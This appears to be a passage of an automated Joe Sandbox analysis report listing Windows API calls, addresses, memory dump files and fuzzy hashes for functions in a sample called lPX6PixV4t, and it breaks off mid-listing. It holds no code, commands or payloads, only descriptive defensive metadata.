                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove$_malloc
                          • String ID:
                          • API String ID: 1938898002-0
                          • Opcode ID: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                          • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                          • Opcode Fuzzy Hash: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                          • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                          • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                          • _memmove.LIBCMT ref: 0044B555
                          • _memmove.LIBCMT ref: 0044B578
                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                          • String ID:
                          • API String ID: 2737351978-0
                          • Opcode ID: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                          • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                          • Opcode Fuzzy Hash: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                          • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                          APIs
                          • ___set_flsgetvalue.LIBCMT ref: 0041523A
                          • __calloc_crt.LIBCMT ref: 00415246
                          • __getptd.LIBCMT ref: 00415253
                          • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                          • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                          • _free.LIBCMT ref: 0041529E
                          • __dosmaperr.LIBCMT ref: 004152A9
                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                          • String ID:
                          • API String ID: 3638380555-0
                          • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                          • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                          • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                          • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 0046C96E
                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Variant$Copy$ClearErrorInitLast
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 3207048006-625585964
                          • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                          • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                          • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                          • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                          APIs
                          • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                          • inet_addr.WSOCK32(?), ref: 0046559B
                          • gethostbyname.WSOCK32(?), ref: 004655A6
                          • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                          • _memmove.LIBCMT ref: 004656CA
                          • GlobalFree.KERNEL32(00000000), ref: 0046575C
                          • WSACleanup.WSOCK32 ref: 00465762
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                          • String ID:
                          • API String ID: 2945290962-0
                          • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                          • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                          • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                          • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                          APIs
                          • GetSystemMetrics.USER32(0000000F), ref: 00440527
                          • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                          • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                          • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                          • String ID:
                          • API String ID: 1457242333-0
                          • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                          • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                          • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                          • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                          APIs
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ConnectRegistry_memmove_wcslen
                          • String ID:
                          • API String ID: 15295421-0
                          • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                          • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                          • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                          • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                          APIs
                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                          • _wcstok.LIBCMT ref: 004675B2
                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                          • _wcscpy.LIBCMT ref: 00467641
                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                          • _wcslen.LIBCMT ref: 00467793
                          • _wcslen.LIBCMT ref: 004677BD
                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                          • String ID: X
                          • API String ID: 780548581-3081909835
                          • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                          • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                          • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                          • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                          APIs
                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                          • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                          • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                          • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                          • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                          • CloseFigure.GDI32(?), ref: 0044751F
                          • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                          • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                          • String ID:
                          • API String ID: 4082120231-0
                          • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                          • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                          • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                          • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                          APIs
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                          • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                          • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                          • String ID:
                          • API String ID: 2027346449-0
                          • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                          • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                          • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                          • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                          APIs
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                          • GetMenu.USER32 ref: 0047A703
                          • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                          • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                          • _wcslen.LIBCMT ref: 0047A79E
                          • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                          • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                          • String ID:
                          • API String ID: 3257027151-0
                          • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                          • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                          • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                          • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                          APIs
                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorLastselect
                          • String ID:
                          • API String ID: 215497628-0
                          • Opcode ID: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                          • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                          • Opcode Fuzzy Hash: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                          • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                          APIs
                          • GetParent.USER32(?), ref: 0044443B
                          • GetKeyboardState.USER32(?), ref: 00444450
                          • SetKeyboardState.USER32(?), ref: 004444A4
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                          • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                          • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                          • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                          APIs
                          • GetParent.USER32(?), ref: 00444633
                          • GetKeyboardState.USER32(?), ref: 00444648
                          • SetKeyboardState.USER32(?), ref: 0044469C
                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                          • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                          • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                          • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                          APIs
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                          • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                          • DeleteObject.GDI32(?), ref: 00455736
                          • DeleteObject.GDI32(?), ref: 00455744
                          • DestroyIcon.USER32(?), ref: 00455752
                          • DestroyWindow.USER32(?), ref: 00455760
                          Memory Dump Source
